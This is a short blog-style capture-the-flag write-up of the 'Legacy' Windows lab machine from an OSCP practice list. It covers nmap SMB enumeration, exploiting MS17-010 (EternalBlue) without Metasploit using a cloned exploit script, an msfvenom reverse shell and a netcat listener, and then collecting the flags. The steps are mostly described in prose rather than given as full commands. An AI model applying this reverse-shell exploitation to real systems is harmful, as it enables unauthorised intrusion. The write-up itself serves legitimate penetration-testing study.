Legacy (Windows) OSCP TJ Null List W/O Metasploit

Hi all this is my second machine write up from OSCP TJ Null Playlist and today we are writing up Legacy which is an easy window machine. So yes we can have a look into it.

First we startup with initial nmap scan we start the full nmap scan as we can seen below.

We did nmap -sC -sV -p- 10.10.10.4

• sC: does the normal nmap script scans
• sV: does the version scan
• -p-: all we does is full port scan

From this we understood only smb server would be a juciest part to find the entry point. So next we did the enumeration on the juciest part smb for this we used nmap and we tried to find is there any smb script to check that so we did the scan like nmap — script smb-vuln* -p 139,445 10.10.10.4 after running this script it will show different vulnerability associated with smb which is available within the information of nmap as we can see below

From here find couple of vulnerabilities and from this we can clearly choose the MS17–010 vulnerability should definitely work. As we are aware we can’t use the metasploit we did a manual search on how to exploit this vulnerability w/o metasploit. So after the research we find a way which is explained detailed on this link. As mentioned in the web page we download the github directory as we can seen below.

After cloning and moving into the directory we created a msfvenom revershell and embedded in the directory. After creating the reverse shell we did the following thing as we can see from the image below.

So we created a revershe shell using msfvenom and we named it as eternalblue and savved it in the directory and after that as we can seen above we did send and execute.py and the target ip and execute it and finally we successfully triggered the vulnerability and on the other side we setup the netcat listener and ones the shell it’s been executed sucessfully we got the shell of the target machine as we can seen below.

From there from the directory we tried search root.txt as we can see below

As we can see below we moved to c drive and from there we searched root.txt asnd it shown the root.txt and next we moved back to c drive and searched for user.txt in the same way and we grabbed the user.txt in the same manner as well and that’s all done about this machine as it was a pretty basic machine. And I’m now done with two machines from the list and hoping that will complete the rest of the machine as well. I will try harder;) Thanks you guys for reading.